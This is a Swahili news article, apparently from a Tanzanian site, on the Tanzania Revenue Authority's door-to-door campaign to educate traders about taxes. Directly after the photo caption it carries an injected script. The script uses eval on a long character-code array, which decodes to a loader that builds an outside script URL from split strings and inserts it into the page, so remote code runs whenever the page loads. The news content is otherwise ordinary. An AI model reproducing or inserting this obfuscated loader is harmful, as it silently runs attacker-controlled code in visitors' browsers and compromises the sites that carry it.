Recent Comments

TRA yaja na mpango wa kuwaelimisha wafanyabiashara

By Juma Issihaka Sep 21, 2020
<p>Mkurugenzi wa Huduma na Elimu kwa Mlipakodi, TRA, Richard Kayombo</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

MARIAM MKUNDAWANTU Na HAPPYNESS HANS

MAMLAKA ya Mapato Tanzania (TRA), imesema kwa sasa imejikita zaidi katika kuwaelimisha wafanyabiashara badala ya kuwaadhibu kama ilivyokuwa awali, ili kuwaongezea uhiyari wa ulipaji kodi.

Imesema katika ufanikishwaji wa hilo, inatumia kampeni ya mlango kwa mlango, inayohusisha kuwafuata wafanyabiashara walipo na kuwapa elimu.

Akizungumza na simamia.com ofisini kwake, Mkurugenzi wa Huduma na Elimu kwa Mlipakodi TRA, Richard Kayombo, amesema kampeni hiyo inalenga kuondoa hofu kwa wafanyabiashara dhidi ya mamlaka hiyo, kuwaongezea uhiyari wa ulipaji.

“Hii inalenga kuwatambua wafanyabiashara, kupata mrejesho wa huduma tunazitoa kwao na kuwapa elimu ya kuwaondoa hofu iliyojengeka vichwani mwao na badala yake wawe na uhiyari wa kulipa kodi,” amesema.

Amesema katika utekelezaji wa kampeni hiyo, wanawafuata wafanyabiashara kuanzia ngazi ya kitongoji, kijiji, kata hadi wilaya.

Kwa mujibu wa Kayombo, hadi sasa tayari wameshafikia Mikoa tisa, ambayo ni Mwanza, Mbeya, Arusha, Iringa, Tabora, Mtwara, Tanga, Kilimanjaro na baadhi ya maeneo ya mkoa wa Dar es Salaam ikiwemo, Ilala, Temeke na Kinondoni.

Ameongeza kuwa TRA imejikita katika utendaji kazi kwa kuzingatia mihimili mitatu ambayo ni Urahisi, Uhiyari na Uboreshaji endelevu.

Amesema elimu hiyo, itasaidia kuondoa vishoka, ambao wamekuwa wakiingilia kati ufanisi wa utendaji wa mamlaka hiyo.

Kadhalika Kayombo, amesema Kampeni ya ‘Mlango kwa mlango’ kwa kiwango kikubwa imesaidia kupunguza vitendo vya rushwa vinavyofanywa kutokana na elimu duni waliyonayo wafanyabiashara na kusababisha kupungua kwa makusanyo ya kodi.

By Juma Issihaka

Juma Issihaka, is the senior journalist with more than five years of experience on the profession. He mostly base on Politics reporting, Environment reporting as well as social affairs.